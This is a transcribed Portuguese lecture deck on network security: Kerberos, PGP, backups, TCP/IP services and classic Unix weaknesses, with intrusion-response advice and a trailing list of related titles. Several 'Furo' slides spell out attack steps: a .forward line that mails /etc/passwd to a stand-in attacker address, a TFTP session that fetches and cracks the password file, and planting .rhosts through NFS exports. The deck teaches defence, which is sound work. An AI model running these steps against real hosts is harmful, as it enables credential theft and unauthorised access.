Mecanismos de Defesa. Criptografia. Aplicações Kerberos - situação após login
|
|
- Derek Anjos da Fonseca
- 8 Há anos
- Visualizações:
Transcrição
1 Mecanismos de Defesa Criptografia Aplicações Kerberos - situação após login cliente possui TCT e chave de sessão TCT criptografado com senha conhecida por AS e ST. Ninguém altera TCT TCT contém : ID do usuário e do servidor de aplicação tempo de vida (8horas) para o TCT cópia da chave de sessão o TCT usado para obter tickets de serviço evita pedir senha ao usuário com frequência
2 Mecanismos de Defesa Criptografia Aplicações Kerberos - como obter um ticket de serviço cliente envia pedido de ticket para o ST, enviando TCT ST decriptografa TCT e verifica tempo de vida, user ID e endereço (devem bater com TCT) para evitar roubo do TCT quando passa na rede (durante o tempo de vida), cliente envia autenticador criptografado com a chave de sessão (que só ele e o ST possuem) com curtissimo tempo de vida
3 Mecanismos de Defesa Criptografia Aplicações Kerberos - como obter o serviço ST envia um ticket de serviço e nova chave de sessão para o cliente a mensagem criptografada com chave de sessão antiga (só o cliente pode pegar) novo ticket criptogrado com chave conhecida pelo ST e pelo servidor de aplicação esse ticket pode ser reusado novo ticket + autenticador enviados para o servidor de aplicação criptogrado com a nova chave de sessão
4 Mecanismos de Defesa Criptografia Aplicações correio eletrônico seguro Efetivamente existem dois sistemas de correio seguro em funcionamento PEM (Privacy Enhanced Mail) desenvolvido pela comunidade Internet e documentado nos RFCs 1421 a 1424 PGP (pretty Good Privacy) desenvolvido por Phil Zimmerman (guerilla freeware) Ambos utilizam chaves públicas (RSA) para autenticar remetentes, embora implementam seu suporte de maneiras diferentes
5 Mecanismos de Defesa Criptografia Aplicações - correio eletrônico seguro PGP (Pretty Good Privacy) funções básicas cifrar dados decifrar dados gerar assinatura digital para envio de dados verificar autenticidade de assinatura digital no recebimento
6 Mecanismos de Defesa Criptografia Aplicações - correio eletrônico seguro PGP (Pretty Good Privacy) ceriticação de chaves/assinatura digital estrutura não-hierárquica - uso um grafo arbitrário de confiança usuários recebem listas de chaves de outros usuários, e os guarda em chaveiros, indicando o grau de confiança no fiador usa o algoritmo RSA com chave pública assinatura é a criptografia de um hash code da mensagem (128 bits) hash code gerado usando MD5
7 Mecanismos de Defesa Criptografia Aplicações - correio eletrônico seguro PGP (Pretty Good Privacy) uso de criptografia IDEA usado para cifrar corpos de mensagens RSA usado para cifrar chaves e certificados MD5 usado para hash mensagens antes de assinatura
8 Mecanismos de Defesa Criptografia Aplicações - correio eletrônico seguro PGP (Pretty Good Privacy) sequência normal cria-se um par de chaves: uma secreta e uma pública distribui-se a chave pública gera mensagem original cifragem com chave secreta somente do sumário matemático do texto plano assina (MD5/RSA) comprime resultado (mensagem + assinatura) criptografa com IDEA e chave simétrica criptografa chave simétrica com RSA envia mensagem assinada e criptografada com a chave simétrica
9 Mecanismos de Defesa Criptografia Aplicações - correio eletrônico seguro PGP (Pretty Good Privacy) sequência normal criptografa chave simétrica com RSA envia mensagem assinada e criptografada com a chave simétrica criptografada se a decifragem do sumário matemático comparada com o texto plano e a comparação de assinaturas não certificar a mensagem, ou a mensagem não provém do dono da chave pública, ou foi alterada, ou foi forjada
10 Segurança de Sistemas Backups Bugs, acidentes, desastres naturais e ataques podem ocorrer aos sistemas e muitas vezes não podem ser evitados, apesar dos esforços. No entanto, se você possui cópias, você pode comparar a versão atual do sistema com a cópia e então recuperar o sistema para um estado estável
11 Segurança de Sistemas Backups Tipos Cópia inicial -->> na intalação do sistema, antes que as pessoas comecem a usá-lo, é feita uma cópia de todos os arquivos e programas. Cópia completa -->> copia tudo para o dispositivo de backup, de forma regular Cópia complementar -->> copia apenas aqueles itens que foram modificados para o dispositivo de backup
12 Segurança de Sistemas Backups Fatores que determinam a estratégia : capacidade de memória disponível no sistema tipo de dispositivo de backup utilizado importância dos dados qanto tempo e dinheiro estão disponíveis para conduzir o backup frequência de uso esperado dos arquivos de backup Ferramentas para realizar backups cópias simples locais (cp, dd), cópias de arquivos (tar), programas especializados (dump/restore), cópias pela rede (rdump/rrestore, rcp, ftp, rdist)
13 Fundamentos do TCP/IP O termo TCP/IP refere-se: a um conjunto de protocolos de comunicação de dados ao nome dos dois protocolos mais importantes desse conjunto de protocolos: Transmission Control Protocol (TCP) Internet Protocol (IP) Características do TCP/IP padrões abertos, implementado por várias arquiteturas de hardware (plataformas) e software (sistemas operacionais)
14 Fundamentos do TCP/IP Características do TCP/IP independência de hardware específico de rede (ethernet, token-ring, dial-up line, X.25 etc) esquema de endereçamento robusto e flexível protocolos de alto nível padronizados para os serviços do usuário (ftp, telnet etc)
15 Processo usuário Processo usuário Camadas OSI 5-7 TCP UDP Camada OSI 4 ICMP IP ARP RARP Camada OSI 3 Interface de Hardware Camadas OSI 1-2
16 Serviços TCP/IP processos clientes X processos servidores existem dois tipos de processos servidores (daemons) : aqueles que estão sempre rodando aqueles que rodam somente quando solicitados clientes são criados assincronamente conexões são identificadas por : IP de origem, porta de origem, IP de destino, porta de destino portas de origem são alocadas dinamicamente alguns serviços possuem portas bem conhecidas (well known ports)
17 Serviços TCP/IP serviços básicos systat (porta TCP 11) -->> fornece informações de status de um host para outros hosts na rede (recomendável desabilitá-lo) FTP (portas TCP 20 e 21) -->> possibilita transferência completa de arquivos entre sistemas (recomendável o uso alternativo de protocolos de autenticação) TELNET (porta TCP 23) -->> possibilita o acesso a computadores remotos na rede (recomendável o uso de criptografia e senhas de uso único)
18 Serviços TCP/IP serviços básicos SMTP (correio eletrônico - porta TCP 25) -->> permite a transferência de mensagens entre computadores (recomendável o uso da versão 8 e posteriores do programa sendmail) TACACS (porta UDP 49) -->> usado para autenticar logins em servidores de terminais (senhas não estão criptografadas e estão portanto sujeitas a sniffing ) DNS (portas TCP e UDP 53) -->> base de dados distribuída que permite mapear endereços IP em nomes de máquinas e vice-versa (recomendável rodar o servidor de nomes em máquina especial sem usuários comuns)
19 Serviços TCP/IP serviços básicos TFTP (porta UDP 69) -->> possibilita transferência de arquivo baseada no protocolo UDP e não oferece segurança (não é recomendável a habilitação do serviço) finger (porta TCP 79) -->> permite obter informação detalhada (nome completo, localização, tempo de login, telefone etc) sobre usuários de um sistema (revela informações que podem ser usadas em ataques do tipo engenharia social)
20 Serviços TCP/IP serviços básicos HTTP (porta TCP 80) -->> usado para solicitar e receber documentos de servidores WWW (recomendável a instalação/configuração de servidores seguros) POP (portas TCP 109 e 110) -->> permite aos usuários a recuperação de correio eletrônico. (recomendável o uso de versões cujos cliente e servidor POP sejam suportados por sistemas de autenticação)
21 Serviços TCP/IP serviços básicos X window System (portas TCP ) -->> sistema de janelas baseado em rede que permite que diferentes máquinas possam ter como saída um único display. Cada device gráfico é controlado por um XWindows server. Xterm é um cliente xhosts controla o acesso ao display xhost só impede futuras conexões, não interferindo nas que já estão ativas. Possibilidade de monitorar o mouse e teclado.
22 Serviços TCP/IP serviços básicos RIP (Routing Internet Protocol) (porta UDP 520) -->> implementa protocolo de roteamento, distribuindo informações sobre novas redes e roteadores PROBLEMA: Propagação de pacotes RIP (Routing Information Protocol) falsos. Implicação: Hosts e roteadores geralmente acreditam neles. Se a máquina atacante está próximo do alvo é fácil subverter o tráfego.
23 Serviços TCP/IP serviços básicos RIP (Routing Internet Protocol) (porta UDP 520) Intruso A Y RIP X B Intruso propagando tabelas de roteamento para subverter o tráfego
24 Serviços TCP/IP serviços básicos RIP (Routing Internet Protocol) (porta UDP 520) Intruso A Y X B Intruso, após subverter o tráfego
25 Principais vulnerabilidades Furos de segurança na internet a workstation local é o ponto de entrada do penetra (hacker, cracker, attacker) a segurança local é ponto chave para a segurnaça mais global exemplos que seguem são baseados em workstations UNIX por serem mais comuns na Internet
26 Principais vulnerabilidades Furos de segurança na internet Furo 1 : conta root cuidado com a conta root só use em caso de necessidade cuidado com a senha do root mudanças frequentes cadastre terminais seguros para fazer login como root
27 Principais vulnerabilidades Furos de segurança na internet Furo 2 : outras contas náo permitir contas sem senhas treinar usuários em escolher senhas limitar tempo de vida das contas habilitar verificação de senhas seguras e envelhecimento de senhas usar shadow passwords tentar quebrar senhas
28 Principais vulnerabilidades Furos de segurança na internet Furo 3 : finger se tiver pouca gente no ar, é hora de entrar!!! Com outras chamadas a finger, pode descobrir : nomes de login, diretórios HOME, shell, último login, último host de login tudo isso é informação valiosa para o hacker!!!
29 Principais vulnerabilidades Furos de segurança na internet Furo 4 : trusted hosts /etc/hosts.equiv e ~/.rhosts são perigosos!! Permitem fazer rsh, rlogin,..., sem senha trusted hosts devem realmente sê-lo?? Você deve conhecer quem administra essas máquinas e confiar nessas pessoas e na política de segurança controle os ~/.rhosts com cuidado!
30 Principais vulnerabilidades Furos de segurança na internet Furo 5 : showmount showmount -e vitima.com.br mostra sistemas de arquivos exportados se descobrir um diretório de login de alguém abaixo de um sistema exportado para todos, pode criar um ~/.rhosts nesse diretório e fazer login remoto com facilidade se um sistema exportado contiver /usr ou /usr/local/bin, pode instalar cavalos de tróia
31 Principais vulnerabilidades Furos de segurança na internet Furo 6 : anonymous FTP ~ftp/etc/passwd frequentemente contém o arquivo completo de senhas. Pode examinar à vontade se diretório ~ftp permitir gravação, coloque a seguinte linha em ~ftp/.forward : /bin/mail hacker@mal.com.br </etc/passwd e envie um mail qualquer para ftp@vitima.com.br
32 Principais vulnerabilidades Furos de segurança na internet Furo 7 : TFTP não requer identificação ou senha permite transferir qualquer arquivo NÃO USE, a não ser que : tenha opção segura (restringe a um diretório) o ataque %tftp tftp> connect vitima.com.br tftp> get /etc/passwd /tmp/f/passwd tftp> quit %crack < /tmp/f/passwd > /tmp/f/pass.facil
33 Principais vulnerabilidades Furos de segurança na internet Furo 8 : rpcinfo pode ser usado para descobrir muita informação valiosa rpcinfo -p vitima.com.br se NIS está rodando se NIS é mestre ou escravo se tem estações diskless (para obter domínios NIS com o comando bootparam) se tem NFS rodando se tem rusersd, rstatd, rexd(rsh sem senha!)
34 Principais vulnerabilidades Furos de segurança na internet Furo 9 : NIS sabendo o nome do domínio NIS, pode pegar todos os mapas do servidor NIS, incluindo : senhas mail aliases é difícil proteger NIS porque tem pouca autenticação não use, se possível
35 Principais vulnerabilidades Furos de segurança na internet Furo 9 : NIS Enganando o NIS server NIS RPC Request NIS Cliente Falso Reply RPC Reply Server Intruso
36 Principais vulnerabilidades Furos de segurança na internet Furo 10 : X-Window se não protegido, pode ser usado para ver telas dos outros computadores capturar teclado de outros computadores
37 Principais vulnerabilidades Como Reconhecer uma Invasão Observe sintomas suspeitos, como: Crash do sistema Contas novas ou antigas com atividade não usual Novos arquivos com nomes estranhos (..^d,... ), geralmente em /tmp Alteração no tamanho de arquivos
38 Principais vulnerabilidades Como Reconhecer uma Invasão Sintomas de alteração nos Logs do sistema (lastlog) Tentativa de escrita em arquivos/diretórios proibidos Access denied sem motivo aparente Performance inexplicavelmente baixa
39 Principais vulnerabilidades Como Reconhecer uma Invasão Tentativas de acesso não sucedidas Logins freqüentes em horário não costumeiro Alteração nas datas dos arquivos de configuração do sistema. Logins sucedidos a partir de locais desconhecidos
40 Principais vulnerabilidades Reagindo em Emergências Quando ocorre algum problema de segurança, há algumas medidas padrões a serem tomadas: Identifique e entenda o problema Contenha ou pare os danos Confirme suas suspeitas e determine os estragos
41 Principais vulnerabilidades Reagindo em Emergências Restaure seu sistema Trate da causa dos problemas Faça um relatório da ocorrência. Controle os boatos, dê esclarecimentos se necessário. Isto é especialmente importante, pois geralmente os rumores vão prejudicar mais que o próprio problema.
42 Principais vulnerabilidades Reagindo em Emergências Computer Emergency Response Team Coordination Center - CERT-CC Criado inicialmente pela DARPA (Defense Advanced Research Projects Agency) para tratar incidentes como o do verme de O CERT monitora segurança de computadores e atividades de quebras de sistemas, alertando os usuários tml ftp://info.cert.org cert@cert.org.
43 Principais vulnerabilidades Reagindo em Emergências Forum of Incident and Response Security Teams - FIRST Reunião de diferentes grupos de resposta a incidentes (inclusive o CERT-CC) Realiza workshop anual first-sec@first.org.
44 Principais vulnerabilidades Reagindo em Emergências Centro de Atendimento a Incidentes de Segurança - CAIS lançamento oficial - Dezembro de missão institucional promover a cultura e disseminação do conhecimento na área de segurança em redes diminuir o número de incidentes de segurança que podem afetar diretamente o backbone da RNP diminuir a magnitude dos danos causados por tais incidentes
45 Ferramentas para verificação de segurança Monitoramento TCPDUMP Disponível para monitoração do tráfego da rede ftp://ftp.ee.lbl.gov/tcpdump2.2.1.tar.z TRACEROUTE Determina o caminho para um determinado destino ftp://ftp.ee.lbl.gov/traceroute.tar.z SNMP Muitas informações podem ser obtidas através dele, especialmente de roteadores Várias implementações disponíveis: CMU-SNMP ftp:/ftp.net.cmu.edu/pub/snmp-dist Scotty/Tkined (TU Braunschweig)
46 Ferramentas para verificação de segurança Auditoria COPS (Computer Oracle and Password System) Procura por erros de configurações no sistema Unix, inclusive o NOS (Network Operating System). Verifica modos/permissões de arquivos Fragilidade de Passwords Consistência do /etc/passwd (entradas duplicadas) Verifica.rhosts,.profile,.cshrc,.forward, e outros nos diretórios home dos usuários
47 Ferramentas para verificação de segurança Auditoria COPS (Computer Oracle and Password System) Verifica arquivos com SUID de root setados CRC de arquivos binários importantes Configuração do anonymous Ftp Restrições ao Tftp, decode alias no sendmail, inetd.conf Outras checagens ( + no hosts.equiv, mount filesystems) Datas de arquivos binários ftp://ftp.cert.org/pub/tools/cops
48 Ferramentas para verificação de segurança Auditoria CRACK Usado para testar as passwords dos usuários Testa vários dicionários, inclusive os que você fornecer Escolhe passwords a serem testadas a partir do /etc/passwd,.plan e.project. Possui arquivos de configurações permitindo testar várias mutações sobre os dicionários fornecidos. ftp://ftp.cert.org/pub/tools/crack ftp://black.ox.ac.uk/wordlists TAMU tiger Conjunto de scripts que procuram por vulnerabilidades em sistemas Unix. Similar ao TRIPWIRE. ftp://net.tamu.edu/pub/security/tamu
49 Ferramentas para verificação de segurança Auditoria TRIPWIRE É um monitor de integridade para sistemas Unix Usa diversas rotinas de chksum/ message-digest/ secure-hash/ signature, visando detectar alterações nos arquivos, bem como monitorar informações mantidas pelo sistema A configuração do Tripwire permite especificar arquivos e diretórios a serem monitorados ou não e a especificar arquivos onde alterações limitadas são permitidas sem gerar alerta
Segurança na Internet
Março de 1998 Ari Frazão Jr. PAL0088 Índice: Parte A: Introdução Parte B: Situação Atual Parte C: Política de Segurança Parte D: Classificação dos Ataques Parte E: Ataques Mais Freqüentes Parte F: Vulnerabilidades
Leia maisNORMAS PARA O USO DE SISTEMA DE PROTEÇÃO FIREWALL DE PERÍMETRO NO ÂMBITO DA REDE INFOVIA-MT
CONSELHO SUPERIOR DO SISTEMA ESTADUAL DE E TECNOLOGIA DA NORMAS PARA O USO DE SISTEMA DE PROTEÇÃO FIREWALL DE PERÍMETRO NO ÂMBITO DA REDE INFOVIA-MT 1/10 CONSELHO SUPERIOR DO SISTEMA ESTADUAL DE E TECNOLOGIA
Leia maisRedes de Computadores. 1 Questões de múltipla escolha. TE090 - Prof. Pedroso. 17 de junho de 2015
TE090 - Prof. Pedroso 17 de junho de 2015 1 Questões de múltipla escolha Exercício 1: Suponha que um roteador foi configurado para descobrir rotas utilizando o protocolo RIP (Routing Information Protocol),
Leia maisDavidson Rodrigo Boccardo flitzdavidson@gmail.com
Segurança em Sistemas de Computação Davidson Rodrigo Boccardo flitzdavidson@gmail.com Segurança Segurança deve considerar o ambiente externo do sistema, e proteger de: Acesso não autorizado Alteração ou
Leia maisREDES DE COMPUTADORES
REDES DE COMPUTADORES 09/2013 Cap.3 Protocolo TCP e a Camada de Transporte 2 Esclarecimentos Esse material é de apoio para as aulas da disciplina e não substitui a leitura da bibliografia básica. Os professores
Leia maisREDES DE COMPUTADORES
REDES DE COMPUTADORES Prof. Esp. Fabiano Taguchi http://fabianotaguchi.wordpress.com fabianotaguchi@gmail.com ENLACE X REDE A camada de enlace efetua de forma eficiente e com controle de erros o envio
Leia maisRedes de Computadores II
Redes de Computadores II UDP Prof: Ricardo Luís R. Peres Tem como objetivo prover uma comunicação entre dois processos de uma mesma sessão que estejam rodando em computadores dentro da mesma rede ou não.
Leia maisO processo de Navegação na Internet APRESENTAÇÃO DO CURSO. Prof. BRUNO GUILHEN. O Internet Explorer. www.brunoguilhen.com.br 1 INFORMÁTICA BÁSICA
APRESENTAÇÃO DO CURSO Prof. BRUNO GUILHEN O processo de Navegação na Internet INFORMÁTICA BÁSICA A NAVEGAÇÃO Programas de Navegação ou Browser : Internet Explorer; O Internet Explorer Netscape Navigator;
Leia maisMódulo de Transmissão e Ativos de Rede Curso Técnico de Informática. Prof. George Silva
Módulo de Transmissão e Ativos de Rede Curso Técnico de Informática Prof. George Silva FTIN FORMAÇÃO TÉCNICA EM INFORMÁTICA COMPONENTES ATIVOS DE REDES AULA 04 Objetivo Entender o encapsulamento de dados
Leia maisSegurança de Rede Prof. João Bosco M. Sobral 1
1 Sinopse do capítulo Problemas de segurança para o campus. Soluções de segurança. Protegendo os dispositivos físicos. Protegendo a interface administrativa. Protegendo a comunicação entre roteadores.
Leia maisProf. Marcelo Cunha Parte 5 www.marcelomachado.com
Prof. Marcelo Cunha Parte 5 www.marcelomachado.com Criado em 1974 Protocolo mais utilizado em redes locais Protocolo utilizado na Internet Possui arquitetura aberta Qualquer fabricante pode adotar a sua
Leia maisCamada de Transporte, protocolos TCP e UDP
Camada de Transporte, protocolos TCP e UDP Conhecer o conceito da camada de transporte e seus principais protocolos: TCP e UDP. O principal objetivo da camada de transporte é oferecer um serviço confiável,
Leia maisRedes de Computadores. Protocolo TCP/IP Profa. Priscila Solís Barreto
Redes de Computadores Protocolo TCP/IP Profa. Priscila Solís Barreto Internet G G G Introdução Protocolo: Conjunto de regras que determinam como o hardware e o software de uma rede devem interagir para
Leia maisProjeto de Redes de Computadores. Desenvolvimento de Estratégias de Segurança e Gerência
Desenvolvimento de Estratégias de Segurança e Gerência Segurança e Gerência são aspectos importantes do projeto lógico de uma rede São freqüentemente esquecidos por projetistas por serem consideradas questões
Leia maisMÓDULO I - INTERNET APRESENTAÇÃO DO CURSO. Prof. BRUNO GUILHEN. Prof. BRUNO GUILHEN. O processo de Navegação na Internet. Aula 01
APRESENTAÇÃO DO CURSO Prof. BRUNO GUILHEN Prof. BRUNO GUILHEN MÓDULO I - INTERNET O processo de Navegação na Internet Aula 01 O processo de Navegação na Internet. USUÁRIO A CONEXÃO PROVEDOR On-Line EMPRESA
Leia maisMÓDULO 8 Modelo de Referência TCP/IP
MÓDULO 8 Modelo de Referência TCP/IP A internet é conhecida como uma rede pública de comunicação de dados com o controle totalmente descentralizado, utiliza para isso um conjunto de protocolos TCP e IP,
Leia maisTCP/IP TCP UDP IP HTTP HTTPS FTP TFTP TELNET POP3 IMAP SMTP SNMP DHCP
TCP/IP TCP UDP IP HTTP HTTPS FTP TFTP TELNET POP3 IMAP SMTP SNMP DHCP HTTP (Hypertext Transfer Protocol ) Protocolo usado na Internet para transferir as páginas da WWW (WEB). HTTPS (HyperText Transfer
Leia maisADDRESS RESOLUTION PROTOCOL. Thiago de Almeida Correia
ADDRESS RESOLUTION PROTOCOL Thiago de Almeida Correia São Paulo 2011 1. Visão Geral Em uma rede de computadores local, os hosts se enxergam através de dois endereços, sendo um deles o endereço Internet
Leia maisSegurança Internet. Fernando Albuquerque. fernando@cic.unb.br www.cic.unb.br/docentes/fernando (061) 273-3589
Segurança Internet Fernando Albuquerque fernando@cic.unb.br www.cic.unb.br/docentes/fernando (061) 273-3589 Tópicos Introdução Autenticação Controle da configuração Registro dos acessos Firewalls Backups
Leia mais1 Redes de Computadores - TCP/IP Luiz Arthur
1 Redes de Computadores - TCP/IP Luiz Arthur TCP/IP O protocolo TCP/IP atualmente é o protocolo mais usado no mundo. Isso se deve a popularização da Internet, a rede mundial de computadores, já que esse
Leia maisNo projeto das primeiras redes de computadores, o hardware foi a principal preocupação e o software ficou em segundo plano.
No projeto das primeiras redes de computadores, o hardware foi a principal preocupação e o software ficou em segundo plano. Essa estratégia foi deixada para trás. Atualmente, o software de rede é altamente
Leia maisREDE DE COMPUTADORES
SERVIÇO NACIONAL DE APRENDIZAGEM COMERCIAL REDE DE COMPUTADORES camadas do Modelo de Referência ISO/OSI Pilha de Protocolos TCP Prof. Airton Ribeiro de Sousa E-mail: airton.ribeiros@gmail.com 1 Camadas
Leia maisModelos de Camadas. Professor Leonardo Larback
Modelos de Camadas Professor Leonardo Larback Modelo OSI Quando surgiram, as redes de computadores eram, em sua totalidade, proprietárias, isto é, uma determinada tecnologia era suportada apenas por seu
Leia maisDisciplina de Redes de Computadores Estudo Dirigido para a Prova II Professor Dr Windson Viana de Carvalho
Disciplina de Redes de Computadores Estudo Dirigido para a Prova II Professor Dr Windson Viana de Carvalho Obs: Não há necessidade de entregar a lista Questões do livro base (Kurose) Questões Problemas
Leia maisRedes de Computadores. Prof. André Y. Kusumoto andre_unip@kusumoto.com.br
Redes de Computadores Prof. André Y. Kusumoto andre_unip@kusumoto.com.br Open Systems Interconnection Modelo OSI No início da utilização das redes de computadores, as tecnologias utilizadas para a comunicação
Leia maisFernando Albuquerque - fernando@cic.unb.br ADMINISTRAÇÃO TCP/IP. Fernando Albuquerque 061-2733589 fernando@cic.unb.br
ADMINISTRAÇÃO TCP/IP Fernando Albuquerque 061-2733589 fernando@cic.unb.br Protocolos TCP/IP - Tópicos Introdução IP Endereçamento Roteamento UDP, TCP Telnet, FTP Correio DNS Web Firewalls Protocolos TCP/IP
Leia maisFirewall. Professor: João Paulo de Brito Gonçalves Disciplina: Serviços de Redes. Campus Cachoeiro Curso Técnico em Informática
Firewall Professor: João Paulo de Brito Gonçalves Disciplina: Serviços de Redes Campus Cachoeiro Curso Técnico em Informática Firewall (definições) Por que do nome firewall? Antigamente, quando as casas
Leia maisCapítulo 1 PROTOCOLOS FUNDAMENTAIS DA INTERNET
Capítulo 1 PROTOCOLOS FUNDAMENTAIS DA INTERNET protocolos TCP/IP são um conjunto de standards que permitem que computadores de todas marcas e feitios comuniquem entre si Algumas datas históricas: 1968
Leia maisINTERNET = ARQUITETURA TCP/IP
Arquitetura TCP/IP Arquitetura TCP/IP INTERNET = ARQUITETURA TCP/IP gatewa y internet internet REDE REDE REDE REDE Arquitetura TCP/IP (Resumo) É útil conhecer os dois modelos de rede TCP/IP e OSI. Cada
Leia maisA mensagem é quebrada em pacotes, e cada pacote pode trafegar por diversos caminhos diferentes POP3 e SMTP trafegam informação em texto claro Nos EUA
Segurança em Comunicações Segurança de E-Mail Carlos Sampaio Segurança de E-Mail: E-Mail Clássico A mensagem é quebrada em pacotes, e cada pacote pode trafegar por diversos caminhos diferentes POP3 e SMTP
Leia maisProf. Samuel Henrique Bucke Brito
- Arquitetura da Internet: TCP/IP www.labcisco.com.br ::: shbbrito@labcisco.com.br Prof. Samuel Henrique Bucke Brito Introdução Toda a estrutura atual da Internet está fundamentada na suíte de protocolos
Leia mais3 SERVIÇOS IP. 3.1 Serviços IP e alguns aspectos de segurança
3 SERVIÇOS IP 3.1 Serviços IP e alguns aspectos de segurança Os serviços IP's são suscetíveis a uma variedade de possíveis ataques, desde ataques passivos (como espionagem) até ataques ativos (como a impossibilidade
Leia maisHackers. Seus dados podem ser inúteis, mas seu computador em si pode ainda ser um recurso valioso.
Firewalls Hackers Gostam de alvos fáceis. Podem não estar interessados nas suas informações. Podem invadir seu computador apenas por diversão. Para treinar um ataque a uma máquina relativamente segura.
Leia maisProfessor: Gládston Duarte
Professor: Gládston Duarte INFRAESTRUTURA FÍSICA DE REDES DE COMPUTADORES Computador Instalação e configuração de Sistemas Operacionais Windows e Linux Arquiteturas físicas e lógicas de redes de computadores
Leia maisRede d s d e d Com o pu p t u ado d r o es Conceitos Básicos M d o e d los o de d Re R de d s:
Tecnologia em Redes de Computadores Redes de Computadores Professor: André Sobral e-mail: alsobral@gmail.com Conceitos Básicos Modelos de Redes: O O conceito de camada é utilizado para descrever como ocorre
Leia maisSegurança em Redes. <Nome> <Instituição> <e-mail>
Segurança em Redes Agenda Riscos Cuidados gerais a serem tomados Configurando o acesso Internet da sua casa Configurando uma rede Wi-Fi doméstica Cuidados: ao se conectar
Leia maisRedes de Computadores
Redes de Computadores Prof. Macêdo Firmino Princípios de Gerência de Redes Macêdo Firmino (IFRN) Redes de Computadores Maio de 2011 1 / 13 Introdução Foi mostrado que uma rede de computadores consiste
Leia maisREDES DE COMPUTADORES Prof. Ricardo Rodrigues Barcelar http://www.ricardobarcelar.com.br
- Aula 2 - MODELO DE REFERÊNCIA TCP (RM TCP) 1. INTRODUÇÃO O modelo de referência TCP, foi muito usado pela rede ARPANET, e atualmente usado pela sua sucessora, a Internet Mundial. A ARPANET é de grande
Leia maisCAMADA DE TRANSPORTE
Curso Técnico de Redes de Computadores Disciplina de Fundamentos de Rede CAMADA DE TRANSPORTE Professora: Juliana Cristina de Andrade E-mail: professora.julianacrstina@gmail.com Site: www.julianacristina.com
Leia maisgenérico proteção de rede filtragem dos pacotes Sem estado (stateless) no próprio pacote. Com estado (stateful) outros pacotes
FIREWALLS Firewalls Definição: Termo genérico utilizado para designar um tipo de proteção de rede que restringe o acesso a certos serviços de um computador ou rede de computadores pela filtragem dos pacotes
Leia maisDoS: Negação de Serviço e formas de defesa
DoS: Negação de Serviço e formas de defesa TchêLinux Ulbra Gravataí http://tchelinux.org/gravatai Elgio Schlemer Ulbra Gravatai http://gravatai.ulbra.tche.br/~elgio 31 de Maio de 2008 Introdução Problemas
Leia maisComponentes de um sistema de firewall - I
Componentes de um sistema de firewall - I O que são Firewalls? Os firewalls são sistemas de segurança que podem ser baseados em: um único elemento de hardware; um único elemento de software instalado num
Leia maisFTP Protocolo de Transferência de Arquivos
FTP Protocolo de Transferência de Arquivos IFSC UNIDADE DE SÃO JOSÉ CURSO TÉCNICO SUBSEQUENTE DE TELECOMUNICAÇÕES! Prof. Tomás Grimm FTP - Protocolo O protocolo FTP é o serviço padrão da Internet para
Leia maisServidor de E-mails e Protocolo SMTP
Campus Cachoeiro Curso Técnico em Informática Servidor E-mails e Protocolo SMTP Professor: João Paulo Brito Gonçalves Disciplina: Serviços Res Definições Servidor Mensagens Um servidor mensagens é responsável
Leia maisTECNOLOGIA WEB INTERNET PROTOCOLOS
INTERNET PROTOCOLOS 1 INTERNET Rede mundial de computadores. Também conhecida por Nuvem ou Teia. Uma rede que permite a comunicação de redes distintas entre os computadores conectados. Rede WAN Sistema
Leia maisRedes de Computadores. Protocolos de comunicação: TCP, UDP
Redes de Computadores Protocolos de comunicação: TCP, UDP Introdução ao TCP/IP Transmission Control Protocol/ Internet Protocol (TCP/IP) é um conjunto de protocolos de comunicação utilizados para a troca
Leia maisIntrodução à Camada de Aplicação. Prof. Eduardo
Introdução à Camada de Aplicação RC Prof. Eduardo Introdução Você sabe que existem vários tipos de programas na Internet? - Talvez você já tenha notado que existem vários programas diferentes para cada
Leia maisRedes de Computadores Camada de Aplicação. Prof. MSc. Hugo Souza
Redes de Computadores Camada de Aplicação Prof. MSc. Hugo Souza É a camada que dispõe a programação para as aplicações de rede através dos protocolos de aplicação; Provém a implantação da arquitetura de
Leia maisFIREWALL. Prof. Fabio de Jesus Souza. fabiojsouza@gmail.com. Professor Fabio Souza
FIREWALL Prof. Fabio de Jesus Souza fabiojsouza@gmail.com Professor Fabio Souza O que são Firewalls? Os firewalls são sistemas de segurança que podem ser baseados em: um único elemento de hardware; um
Leia maisPROJETO DE REDES www.projetoderedes.com.br
PROJETO DE REDES www.projetoderedes.com.br Curso de Tecnologia em Redes de Computadores Disciplina: Tópicos Avançados II 5º período Professor: José Maurício S. Pinheiro AULA 2: Padrão X.509 O padrão X.509
Leia maisCamada de Aplicação. Prof. Eduardo
Camada de Aplicação RC Prof. Eduardo Introdução Você sabe que existem vários tipos de programas na Internet? - Talvez você já tenha notado que existem vários programas diferentes para cada um desses tipos.
Leia maisGerência de Segurança
Gerência de segurança envolve a proteção de dados sensíveis dos dispositivos de rede através do controle de acesso aos pontos onde tais informações se localizam Benefícios do processo de gerência de segurança
Leia maisUSO GERAL DOS PROTOCOLOS SMTP, FTP, TCP, UDP E IP
USO GERAL DOS PROTOCOLOS SMTP, FTP, TCP, UDP E IP SMTP "Protocolo de transferência de correio simples (ou em inglês Simple Mail Transfer Protocol ) é o protocolo padrão para envio de e- mails através da
Leia maisCapítulo 8 - Aplicações em Redes
Capítulo 8 - Aplicações em Redes Prof. Othon Marcelo Nunes Batista Mestre em Informática 1 de 31 Roteiro Sistemas Operacionais em Rede Modelo Cliente-Servidor Modelo P2P (Peer-To-Peer) Aplicações e Protocolos
Leia maisProjeto de Redes de Computadores. Projeto do Esquema de Endereçamento e de Nomes
Projeto do Esquema de Endereçamento e de Nomes Lembrar a estrutura organizacional do cliente ajuda a planejar a atribuição de endereços e nomes O mapa topológico também ajuda, pois indica onde há hierarquia
Leia maisAula prática. Objetivo IPCONFIG. Prof. Leandro Pykosz Leandro@sulbbs.com.br. Informa a configuração atual de rede da máquina;
Aula prática Prof. Leandro Pykosz Leandro@sulbbs.com.br Objetivo Nesta aula, você aprenderá a utilizar alguns utilitários de rede que podem ajudá-lo a identificar problemas na rede. No windows existem
Leia maisSMTP, POP, IMAP, DHCP e SNMP. Professor Leonardo Larback
SMTP, POP, IMAP, DHCP e SNMP Professor Leonardo Larback Protocolo SMTP O SMTP (Simple Mail Transfer Protocol) é utilizado no sistema de correio eletrônico da Internet. Utiliza o protocolo TCP na camada
Leia maisModelo de referência OSI. Modelo TCP/IP e Internet de cinco camadas
Modelo de referência OSI. Modelo TCP/IP e Internet de cinco camadas Conhecer os modelo OSI, e TCP/IP de cinco camadas. É importante ter um padrão para a interoperabilidade entre os sistemas para não ficarmos
Leia maisProtocolos Telnet e SSH. Professor Leonardo Larback
